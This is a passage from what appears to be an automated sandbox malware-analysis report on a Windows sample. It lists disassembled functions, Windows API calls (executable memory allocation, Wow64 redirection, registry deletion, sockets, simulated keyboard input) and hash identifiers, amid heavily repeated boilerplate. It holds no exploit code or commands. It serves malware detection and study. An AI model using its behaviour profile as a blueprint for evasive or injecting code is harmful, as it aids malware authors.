                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath_memmove_wcscat
                                                            • String ID: @=$SL
                                                            • API String ID: 257928180-3689620055
                                                            • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                            • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                                                            • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                            • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __calloc_crt
                                                            • String ID: K$@BL
                                                            • API String ID: 3494438863-2209178351
                                                            • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                            • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                                            • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                            • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                            • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                                            • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                            • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                            • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                                            • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                            • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                            • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                                            • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                            • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                            • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                                            • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                            • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                            • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                                                            • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                            • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                                            • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                                              • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                                            • _memmove.LIBCMT ref: 0047E314
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            • Opcode ID: c81b934990736e7ca586263f53b5abc7894b56bd203991636d632f22b4f8536e
                                                            • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                                                            • Opcode Fuzzy Hash: c81b934990736e7ca586263f53b5abc7894b56bd203991636d632f22b4f8536e
                                                            • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 004780C3
                                                            • CoUninitialize.OLE32 ref: 004780CE
                                                              • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                            • VariantInit.OLEAUT32(?), ref: 004780D9
                                                            • VariantClear.OLEAUT32(?), ref: 004783AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            • Opcode ID: 400ebff4e61cf3e1ee78082ae144ede4a2b3438fd103daf129fc81fa1b0e2089
                                                            • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                                                            • Opcode Fuzzy Hash: 400ebff4e61cf3e1ee78082ae144ede4a2b3438fd103daf129fc81fa1b0e2089
                                                            • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: 7754becb9dd03c3fb11d1c3921ac7f651955ce22d4d8892edf307a5e4b31ea25
                                                            • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                                                            • Opcode Fuzzy Hash: 7754becb9dd03c3fb11d1c3921ac7f651955ce22d4d8892edf307a5e4b31ea25
                                                            • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                                              • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                              • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            • Opcode ID: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                                                            • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                                                            • Opcode Fuzzy Hash: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                                                            • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                            • _strlen.LIBCMT ref: 004764D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: 8fb790e2a9c8bd6545a14043e7be6f0b7450ba35f96a2d2a5733219fc9a7891e
                                                            • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                                            • Opcode Fuzzy Hash: 8fb790e2a9c8bd6545a14043e7be6f0b7450ba35f96a2d2a5733219fc9a7891e
                                                            • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00B9354C
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B935D5
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B935E7
                                                            • __freea.LIBCMT ref: 00B935F0
                                                              • Part of subcall function 00B932FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B9332C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: 299f0acf27ebcb935bf52e1c339f63ea4bfe06c22bfdd1b01191191e18e746e0
                                                            • Instruction ID: adb11c63a6952477ae2ff3a3ea6434f1aeffd7ea91624f191e2aafef0af65cac
                                                            • Opcode Fuzzy Hash: 299f0acf27ebcb935bf52e1c339f63ea4bfe06c22bfdd1b01191191e18e746e0
                                                            • Instruction Fuzzy Hash: 8F31BC72A0021AABDF259F64DC85DAE7BE5EB54B10F0641B9FC04D7250EB35CE50CB90
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                            • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                            • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                            • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                            • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                            • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                            • MessageBeep.USER32(00000000), ref: 0048AC57
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                            • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                            • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                            • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                            • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                                            • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                            • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                                            APIs
                                                            • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00460C66
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                                            • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00460D33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
